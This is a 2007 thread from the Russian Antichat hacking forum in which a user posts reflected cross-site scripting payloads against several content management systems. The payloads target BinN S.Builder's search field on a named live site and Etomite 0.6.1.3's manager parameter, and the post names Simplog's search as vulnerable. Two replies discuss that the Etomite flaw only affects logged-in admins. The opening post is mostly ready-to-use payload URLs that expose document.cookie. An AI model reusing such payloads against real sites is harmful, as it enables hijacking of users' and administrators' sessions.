ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу пасивные хсс на некоторых Cms
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

пасивные хсс на некоторых Cms
  #1  
Старый 16.03.2007, 19:51
Аватар для Robin_Hood
Robin_Hood
Участник форума
Регистрация: 30.10.2006
Сообщений: 238
Провел на форуме:
966901

Репутация: 444
Отправить сообщение для Robin_Hood с помощью ICQ
По умолчанию пасивные хсс на некоторых Cms
CMS BinN S.Builder - уязвимо поле "поиск"
пример:
Код:
http://cmsobzor.ru/searth.php?search_words=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0
etomite0613
уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом

Код:
http://localhost/etomite0613/etomite0613/manager/index.php?a=17'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://localhost/etomite0613/etomite0613/manager/
- дефолтовая админка

http://www.simplog.org - уязвимость в поиске
 

  #2  
Старый 16.03.2007, 19:55
Аватар для freddi
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию
Цитата:
Сообщение от Robin_Hood  
etomite0613
уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом
Я думаю когда ктонибудь получит права админа на этой системе ему уже будет похрену на эти хсс))
 

  #3  
Старый 16.03.2007, 19:56
Аватар для Robin_Hood
Robin_Hood
Участник форума
Регистрация: 30.10.2006
Сообщений: 238
Провел на форуме:
966901

Репутация: 444
Отправить сообщение для Robin_Hood с помощью ICQ
По умолчанию
freddi я не так выразился) хсс подействует только на админа сайта, для обычных юзеров не покатит
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Reviews CMS w3r3.w01f PHP, PERL, MySQL, JavaScript 33 12.04.2010 23:18
Обзор бесплатных Cms em00s7 PHP, PERL, MySQL, JavaScript 16 03.07.2009 13:13
активные хсс на некоторых онлайн-дневников Robin_Hood Уязвимости 0 08.02.2007 20:03
Девять Комерческих Cms w3r3.w01f PHP, PERL, MySQL, JavaScript 1 21.04.2006 00:27
ХСС под Оперу, Ff. FHT Разное - Покупка, продажа, обмен 0 07.03.2006 21:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ